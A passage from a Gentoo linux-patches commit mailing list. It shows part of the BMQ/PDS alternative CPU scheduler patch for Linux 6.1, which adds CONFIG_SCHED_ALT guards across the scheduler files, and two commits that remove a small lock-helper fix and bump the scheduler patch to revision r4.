-@@ -85,7 +85,9 @@
- 
- #ifdef CONFIG_SMP
- # include "cpupri.c"
-+#ifndef CONFIG_SCHED_ALT
- # include "stop_task.c"
-+#endif
- # include "topology.c"
- #endif
- 
-diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
-index 1207c78f85c1..68812e0756cb 100644
---- a/kernel/sched/cpufreq_schedutil.c
-+++ b/kernel/sched/cpufreq_schedutil.c
-@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
- 	struct rq *rq = cpu_rq(sg_cpu->cpu);
- 
- 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
-+#ifndef CONFIG_SCHED_ALT
- 	sg_cpu->bw_dl = cpu_bw_dl(rq);
- 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
- 					  FREQUENCY_UTIL, NULL);
-+#else
-+	sg_cpu->bw_dl = 0;
-+	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
-+#endif /* CONFIG_SCHED_ALT */
- }
- 
- /**
-@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
-  */
- static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
- {
-+#ifndef CONFIG_SCHED_ALT
- 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
- 		sg_cpu->sg_policy->limits_changed = true;
-+#endif
- }
- 
- static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
-@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
- 	}
- 
- 	ret = sched_setattr_nocheck(thread, &attr);
-+
- 	if (ret) {
- 		kthread_stop(thread);
- 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
-@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
- #ifdef CONFIG_ENERGY_MODEL
- static void rebuild_sd_workfn(struct work_struct *work)
- {
-+#ifndef CONFIG_SCHED_ALT
- 	rebuild_sched_domains_energy();
-+#endif /* CONFIG_SCHED_ALT */
- }
- static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
- 
-diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
-index 95fc77853743..b48b3f9ed47f 100644
---- a/kernel/sched/cputime.c
-+++ b/kernel/sched/cputime.c
-@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
- 	p->utime += cputime;
- 	account_group_user_time(p, cputime);
- 
--	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
-+	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
- 
- 	/* Add user time to cpustat. */
- 	task_group_account_field(p, index, cputime);
-@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
- 	p->gtime += cputime;
- 
- 	/* Add guest time to cpustat. */
--	if (task_nice(p) > 0) {
-+	if (task_running_nice(p)) {
- 		task_group_account_field(p, CPUTIME_NICE, cputime);
- 		cpustat[CPUTIME_GUEST_NICE] += cputime;
- 	} else {
-@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
- #ifdef CONFIG_64BIT
- static inline u64 read_sum_exec_runtime(struct task_struct *t)
- {
--	return t->se.sum_exec_runtime;
-+	return tsk_seruntime(t);
- }
- #else
- static u64 read_sum_exec_runtime(struct task_struct *t)
-@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
- 	struct rq *rq;
- 
- 	rq = task_rq_lock(t, &rf);
--	ns = t->se.sum_exec_runtime;
-+	ns = tsk_seruntime(t);
- 	task_rq_unlock(rq, t, &rf);
- 
- 	return ns;
-@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
- void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
- {
- 	struct task_cputime cputime = {
--		.sum_exec_runtime = p->se.sum_exec_runtime,
-+		.sum_exec_runtime = tsk_seruntime(p),
- 	};
- 
- 	if (task_cputime(p, &cputime.utime, &cputime.stime))
-diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
-index 1637b65ba07a..033c6deeb515 100644
---- a/kernel/sched/debug.c
-+++ b/kernel/sched/debug.c
-@@ -7,6 +7,7 @@
-  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
-  */
- 
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * This allows printing both to /proc/sched_debug and
-  * to the console
-@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
- };
- 
- #endif /* SMP */
-+#endif /* !CONFIG_SCHED_ALT */
- 
- #ifdef CONFIG_PREEMPT_DYNAMIC
- 
-@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
- 
- #endif /* CONFIG_PREEMPT_DYNAMIC */
- 
-+#ifndef CONFIG_SCHED_ALT
- __read_mostly bool sched_debug_verbose;
- 
- static const struct seq_operations sched_debug_sops;
-@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
- 	.llseek		= seq_lseek,
- 	.release	= seq_release,
- };
-+#endif /* !CONFIG_SCHED_ALT */
- 
- static struct dentry *debugfs_sched;
- 
-@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
- 
- 	debugfs_sched = debugfs_create_dir("sched", NULL);
- 
-+#ifndef CONFIG_SCHED_ALT
- 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
- 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
-+#endif /* !CONFIG_SCHED_ALT */
- #ifdef CONFIG_PREEMPT_DYNAMIC
- 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
- #endif
- 
-+#ifndef CONFIG_SCHED_ALT
- 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
- 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
- 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
-@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
- #endif
- 
- 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
-+#endif /* !CONFIG_SCHED_ALT */
- 
- 	return 0;
- }
- late_initcall(sched_init_debug);
- 
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_SMP
- 
- static cpumask_var_t		sd_sysctl_cpus;
-@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
- 	memset(&p->stats, 0, sizeof(p->stats));
- #endif
- }
-+#endif /* !CONFIG_SCHED_ALT */
- 
- void resched_latency_warn(int cpu, u64 latency)
- {
-diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
-index f26ab2675f7d..480d4ad16d45 100644
---- a/kernel/sched/idle.c
-+++ b/kernel/sched/idle.c
-@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
- 		do_idle();
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * idle-task scheduling class.
-  */
-@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
- 	.switched_to		= switched_to_idle,
- 	.update_curr		= update_curr_idle,
- };
-+#endif
-diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
-new file mode 100644
-index 000000000000..56a649d02e49
---- /dev/null
-+++ b/kernel/sched/pds.h
-@@ -0,0 +1,127 @@
-+#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
-+
-+static int sched_timeslice_shift = 22;
-+
-+#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
-+
-+/*
-+ * Common interfaces
-+ */
-+static inline void sched_timeslice_imp(const int timeslice_ms)
-+{
-+	if (2 == timeslice_ms)
-+		sched_timeslice_shift = 21;
-+}
-+
-+static inline int
-+task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
-+{
-+	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
-+
-+	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
-+		      "pds: task_sched_prio_normal() delta %lld\n", delta))
-+		return NORMAL_PRIO_NUM - 1;
-+
-+	return (delta < 0) ? 0 : delta;
-+}
-+
-+static inline int task_sched_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio :
-+		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
-+}
-+
-+static inline int
-+task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
-+		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
-+}
-+
-+static inline int sched_prio2idx(int prio, struct rq *rq)
-+{
-+	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
-+		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
-+						  rq->time_edge);
-+}
-+
-+static inline int sched_idx2prio(int idx, struct rq *rq)
-+{
-+	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
-+		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
-+				NORMAL_PRIO_MOD(rq->time_edge));
-+}
-+
-+static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
-+{
-+	if (p->prio >= MAX_RT_PRIO)
-+		p->deadline = (rq->clock >> sched_timeslice_shift) +
-+			p->static_prio - (MAX_PRIO - NICE_WIDTH);
-+}
-+
-+int task_running_nice(struct task_struct *p)
-+{
-+	return (p->prio > DEFAULT_PRIO);
-+}
-+
-+static inline void update_rq_time_edge(struct rq *rq)
-+{
-+	struct list_head head;
-+	u64 old = rq->time_edge;
-+	u64 now = rq->clock >> sched_timeslice_shift;
-+	u64 prio, delta;
-+
-+	if (now == old)
-+		return;
-+
-+	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
-+	INIT_LIST_HEAD(&head);
-+
-+	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
-+		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
-+				      NORMAL_PRIO_MOD(prio + old), &head);
-+
-+	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
-+		rq->queue.bitmap[2] >> delta;
-+	rq->time_edge = now;
-+	if (!list_empty(&head)) {
-+		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
-+		struct task_struct *p;
-+
-+		list_for_each_entry(p, &head, sq_node)
-+			p->sq_idx = idx;
-+
-+		list_splice(&head, rq->queue.heads + idx);
-+		rq->queue.bitmap[2] |= 1UL;
-+	}
-+}
-+
-+static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
-+{
-+	p->time_slice = sched_timeslice_ns;
-+	sched_renew_deadline(p, rq);
-+	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
-+		requeue_task(p, rq, task_sched_prio_idx(p, rq));
-+}
-+
-+static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
-+{
-+	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
-+	if (unlikely(p->deadline > max_dl))
-+		p->deadline = max_dl;
-+}
-+
-+static void sched_task_fork(struct task_struct *p, struct rq *rq)
-+{
-+	sched_renew_deadline(p, rq);
-+}
-+
-+static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
-+{
-+	time_slice_expired(p, rq);
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline void sched_task_ttwu(struct task_struct *p) {}
-+#endif
-+static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
-diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
-index 0f310768260c..bd38bf738fe9 100644
---- a/kernel/sched/pelt.c
-+++ b/kernel/sched/pelt.c
-@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
- 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * sched_entity:
-  *
-@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
- 
- 	return 0;
- }
-+#endif
- 
--#ifdef CONFIG_SCHED_THERMAL_PRESSURE
-+#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
- /*
-  * thermal:
-  *
-diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
-index 3a0e0dc28721..e8a7d84aa5a5 100644
---- a/kernel/sched/pelt.h
-+++ b/kernel/sched/pelt.h
-@@ -1,13 +1,15 @@
- #ifdef CONFIG_SMP
- #include "sched-pelt.h"
- 
-+#ifndef CONFIG_SCHED_ALT
- int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
- int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
- int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
- int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
- int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
-+#endif
- 
--#ifdef CONFIG_SCHED_THERMAL_PRESSURE
-+#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
- int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
- 
- static inline u64 thermal_load_avg(struct rq *rq)
-@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
- 	return PELT_MIN_DIVIDER + avg->period_contrib;
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- static inline void cfs_se_util_change(struct sched_avg *avg)
- {
- 	unsigned int enqueued;
-@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
- 	return rq_clock_pelt(rq_of(cfs_rq));
- }
- #endif
-+#endif /* CONFIG_SCHED_ALT */
- 
- #else
- 
-+#ifndef CONFIG_SCHED_ALT
- static inline int
- update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
- {
-@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
- {
- 	return 0;
- }
-+#endif
- 
- static inline int
- update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
-diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
-index a4a20046e586..c363693cd869 100644
---- a/kernel/sched/sched.h
-+++ b/kernel/sched/sched.h
-@@ -5,6 +5,10 @@
- #ifndef _KERNEL_SCHED_SCHED_H
- #define _KERNEL_SCHED_SCHED_H
- 
-+#ifdef CONFIG_SCHED_ALT
-+#include "alt_sched.h"
-+#else
-+
- #include <linux/sched/affinity.h>
- #include <linux/sched/autogroup.h>
- #include <linux/sched/cpufreq.h>
-@@ -3183,4 +3187,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
- 	cgroup_account_cputime(curr, delta_exec);
- }
- 
-+static inline int task_running_nice(struct task_struct *p)
-+{
-+	return (task_nice(p) > 0);
-+}
-+#endif /* !CONFIG_SCHED_ALT */
- #endif /* _KERNEL_SCHED_SCHED_H */
-diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
-index 857f837f52cb..5486c63e4790 100644
---- a/kernel/sched/stats.c
-+++ b/kernel/sched/stats.c
-@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 	} else {
- 		struct rq *rq;
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 		struct sched_domain *sd;
- 		int dcount = 0;
-+#endif
- #endif
- 		cpu = (unsigned long)(v - 2);
- 		rq = cpu_rq(cpu);
-@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 		seq_printf(seq, "\n");
- 
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 		/* domain-specific stats */
- 		rcu_read_lock();
- 		for_each_domain(cpu, sd) {
-@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 			    sd->ttwu_move_balance);
- 		}
- 		rcu_read_unlock();
-+#endif
- #endif
- 	}
- 	return 0;
-diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
-index 84a188913cc9..53934e7ef5db 100644
---- a/kernel/sched/stats.h
-+++ b/kernel/sched/stats.h
-@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
- 
- #endif /* CONFIG_SCHEDSTATS */
- 
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_FAIR_GROUP_SCHED
- struct sched_entity_stats {
- 	struct sched_entity     se;
-@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
- #endif
- 	return &task_of(se)->stats;
- }
-+#endif /* CONFIG_SCHED_ALT */
- 
- #ifdef CONFIG_PSI
- void psi_task_change(struct task_struct *task, int clear, int set);
-diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
-index 8739c2a5a54e..d8dd6c15eb47 100644
---- a/kernel/sched/topology.c
-+++ b/kernel/sched/topology.c
-@@ -3,6 +3,7 @@
-  * Scheduler topology setup/handling methods
-  */
- 
-+#ifndef CONFIG_SCHED_ALT
- DEFINE_MUTEX(sched_domains_mutex);
- 
- /* Protected by sched_domains_mutex: */
-@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
-  */
- 
- static int default_relax_domain_level = -1;
-+#endif /* CONFIG_SCHED_ALT */
- int sched_domain_level_max;
- 
-+#ifndef CONFIG_SCHED_ALT
- static int __init setup_relax_domain_level(char *str)
- {
- 	if (kstrtoint(str, 0, &default_relax_domain_level))
-@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
- 
- 	return sd;
- }
-+#endif /* CONFIG_SCHED_ALT */
- 
- /*
-  * Topology list, bottom-up.
-@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
- 	sched_domain_topology_saved = NULL;
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_NUMA
- 
- static const struct cpumask *sd_numa_mask(int cpu)
-@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
- 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
- 	mutex_unlock(&sched_domains_mutex);
- }
-+#else /* CONFIG_SCHED_ALT */
-+void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
-+			     struct sched_domain_attr *dattr_new)
-+{}
-+
-+#ifdef CONFIG_NUMA
-+int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
-+{
-+	return best_mask_cpu(cpu, cpus);
-+}
-+#endif /* CONFIG_NUMA */
-+#endif
-diff --git a/kernel/sysctl.c b/kernel/sysctl.c
-index c6d9dec11b74..2bc42ce8b48e 100644
---- a/kernel/sysctl.c
-+++ b/kernel/sysctl.c
-@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
- 
- /* Constants used for minimum and maximum */
- 
-+#ifdef CONFIG_SCHED_ALT
-+extern int sched_yield_type;
-+#endif
-+
- #ifdef CONFIG_PERF_EVENTS
- static const int six_hundred_forty_kb = 640 * 1024;
- #endif
-@@ -1633,6 +1637,7 @@ int proc_do_static_key(struct ctl_table *table, int write,
- }
- 
- static struct ctl_table kern_table[] = {
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_NUMA_BALANCING
- 	{
- 		.procname	= "numa_balancing",
-@@ -1652,6 +1657,7 @@ static struct ctl_table kern_table[] = {
- 		.extra1		= SYSCTL_ZERO,
- 	},
- #endif /* CONFIG_NUMA_BALANCING */
-+#endif /* !CONFIG_SCHED_ALT */
- 	{
- 		.procname	= "panic",
- 		.data		= &panic_timeout,
-@@ -1953,6 +1959,17 @@ static struct ctl_table kern_table[] = {
- 		.proc_handler	= proc_dointvec,
- 	},
- #endif
-+#ifdef CONFIG_SCHED_ALT
-+	{
-+		.procname	= "yield_type",
-+		.data		= &sched_yield_type,
-+		.maxlen		= sizeof (int),
-+		.mode		= 0644,
-+		.proc_handler	= &proc_dointvec_minmax,
-+		.extra1		= SYSCTL_ZERO,
-+		.extra2		= SYSCTL_TWO,
-+	},
-+#endif
- #if defined(CONFIG_S390) && defined(CONFIG_SMP)
- 	{
- 		.procname	= "spin_retry",
-diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
-index 3ae661ab6260..35f0176dcdb0 100644
---- a/kernel/time/hrtimer.c
-+++ b/kernel/time/hrtimer.c
-@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
- 	int ret = 0;
- 	u64 slack;
- 
-+#ifndef CONFIG_SCHED_ALT
- 	slack = current->timer_slack_ns;
- 	if (dl_task(current) || rt_task(current))
-+#endif
- 		slack = 0;
- 
- 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
-diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
-index cb925e8ef9a8..67d823510f5c 100644
---- a/kernel/time/posix-cpu-timers.c
-+++ b/kernel/time/posix-cpu-timers.c
-@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
- 	u64 stime, utime;
- 
- 	task_cputime(p, &utime, &stime);
--	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
-+	store_samples(samples, stime, utime, tsk_seruntime(p));
- }
- 
- static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
-@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
- 	}
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- static inline void check_dl_overrun(struct task_struct *tsk)
- {
- 	if (tsk->dl.dl_overrun) {
-@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
- 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
- 	}
- }
-+#endif
- 
- static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
- {
-@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
- 	u64 samples[CPUCLOCK_MAX];
- 	unsigned long soft;
- 
-+#ifndef CONFIG_SCHED_ALT
- 	if (dl_task(tsk))
- 		check_dl_overrun(tsk);
-+#endif
- 
- 	if (expiry_cache_is_inactive(pct))
- 		return;
-@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
- 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
- 	if (soft != RLIM_INFINITY) {
- 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
--		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
-+		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
- 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
- 
- 		/* At the hard limit, send SIGKILL. No further action. */
-@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
- 			return true;
- 	}
- 
-+#ifndef CONFIG_SCHED_ALT
- 	if (dl_task(tsk) && tsk->dl.dl_overrun)
- 		return true;
-+#endif
- 
- 	return false;
- }
-diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
-index a2d301f58ced..2ccdede8585c 100644
---- a/kernel/trace/trace_selftest.c
-+++ b/kernel/trace/trace_selftest.c
-@@ -1143,10 +1143,15 @@ static int trace_wakeup_test_thread(void *data)
- {
- 	/* Make this a -deadline thread */
- 	static const struct sched_attr attr = {
-+#ifdef CONFIG_SCHED_ALT
-+		/* No deadline on BMQ/PDS, use RR */
-+		.sched_policy = SCHED_RR,
-+#else
- 		.sched_policy = SCHED_DEADLINE,
- 		.sched_runtime = 100000ULL,
- 		.sched_deadline = 10000000ULL,
- 		.sched_period = 10000000ULL
-+#endif
- 	};
- 	struct wakeup_test_data *x = data;
- 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-09 12:47 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-09 12:47 UTC (permalink / raw
  To: gentoo-commits

commit:     85941b985a0a1a23d17486db978bd18577b97dcc
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  9 12:47:03 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  9 12:47:03 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=85941b98

Remove BMQ Fix patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 5021_sched-alt-missing-rq-lock-irq-function.patch | 30 -----------------------
 1 file changed, 30 deletions(-)

diff --git a/5021_sched-alt-missing-rq-lock-irq-function.patch b/5021_sched-alt-missing-rq-lock-irq-function.patch
deleted file mode 100644
index 04cca612..00000000
--- a/5021_sched-alt-missing-rq-lock-irq-function.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 4157360d2e1cbdfb8065f151dbe057b17188a23f Mon Sep 17 00:00:00 2001
-From: Tor Vic <torvic9@mailbox.org>
-Date: Mon, 7 Nov 2022 15:11:54 +0100
-Subject: [PATCH] sched/alt: Add missing rq_lock_irq() function to header file
-
----
- kernel/sched/alt_sched.h | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
-index 93ff3bddd36f..a00bc84b93b2 100644
---- a/kernel/sched/alt_sched.h
-+++ b/kernel/sched/alt_sched.h
-@@ -387,6 +387,13 @@ task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
- 	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
- }
- 
-+static inline void
-+rq_lock_irq(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irq(&rq->lock);
-+}
-+
- static inline void
- rq_lock(struct rq *rq, struct rq_flags *rf)
- 	__acquires(rq->lock)
--- 
-GitLab
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-09 12:40 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-09 12:40 UTC (permalink / raw
  To: gentoo-commits

commit:     aa99b5941813b8267a0dee6085aadda60385aede
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  9 12:39:52 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  9 12:39:52 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=aa99b594

Bump BMQ Patch to 6.1-r4

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |   2 +-
 ... => 5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch | 216 ++++++++++++++-------
 2 files changed, 148 insertions(+), 70 deletions(-)

diff --git a/0000_README b/0000_README
index 1fb22543..62ade3e6 100644
--- a/0000_README
+++ b/0000_README
@@ -139,6 +139,6 @@ Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
 
-Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch
+Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
 From:   https://gitlab.com/alfredchen/projectc
 Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
similarity index 98%
rename from 5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch
rename to 5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
index 783f3bca..7c2a77d3 100644
--- a/5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch
+++ b/5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
@@ -369,7 +369,7 @@ index 94125d3b6893..c87ba766d354 100644
  
 +menuconfig SCHED_ALT
 +	bool "Alternative CPU Schedulers"
-+	default n
++	default y
 +	help
 +	  This feature enable alternative CPU scheduler"
 +
@@ -632,10 +632,10 @@ index 976092b7bd45..31d587c16ec1 100644
  obj-y += build_utility.o
 diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
 new file mode 100644
-index 000000000000..4bea0c025475
+index 000000000000..a9e906b229eb
 --- /dev/null
 +++ b/kernel/sched/alt_core.c
-@@ -0,0 +1,7912 @@
+@@ -0,0 +1,7982 @@
 +/*
 + *  kernel/sched/alt_core.c
 + *
@@ -665,7 +665,6 @@ index 000000000000..4bea0c025475
 +#include <linux/init_task.h>
 +#include <linux/kcov.h>
 +#include <linux/kprobes.h>
-+#include <linux/profile.h>
 +#include <linux/nmi.h>
 +#include <linux/scs.h>
 +
@@ -706,7 +705,7 @@ index 000000000000..4bea0c025475
 +#define sched_feat(x)	(0)
 +#endif /* CONFIG_SCHED_DEBUG */
 +
-+#define ALT_SCHED_VERSION "v6.1-r0"
++#define ALT_SCHED_VERSION "v6.1-r4"
 +
 +/* rt_prio(prio) defined in include/linux/sched/rt.h */
